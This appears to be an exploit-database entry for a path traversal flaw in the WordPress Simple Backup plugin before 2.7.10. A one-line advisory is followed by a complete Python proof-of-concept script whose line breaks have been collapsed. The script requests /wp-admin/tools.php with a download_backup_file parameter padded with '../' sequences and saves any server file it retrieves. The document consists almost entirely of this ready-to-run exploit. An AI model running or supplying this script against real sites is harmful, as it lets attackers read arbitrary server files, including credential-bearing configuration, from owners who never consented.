Headline
WordPress Simple Backup Path Traversal / Arbitrary File Download
WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and response.headers.get('Content-Disposition') \ and 'attachment; filename' in response.headers['Content-Disposition'] \ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0: print(response.text) # Replace with the desired action for the downloaded content file_path = f'simplebackup_{file_name}' with open(file_path, 'wb') as file: file.write(response.content) print(f'File saved in: {file_path}') else: print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <file_name> <depth>") sys.exit(1) target_url = sys.argv[1] file_name = sys.argv[2] depth = int(sys.argv[3]) print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n") time.sleep(5) exploit(target_url, file_name, depth)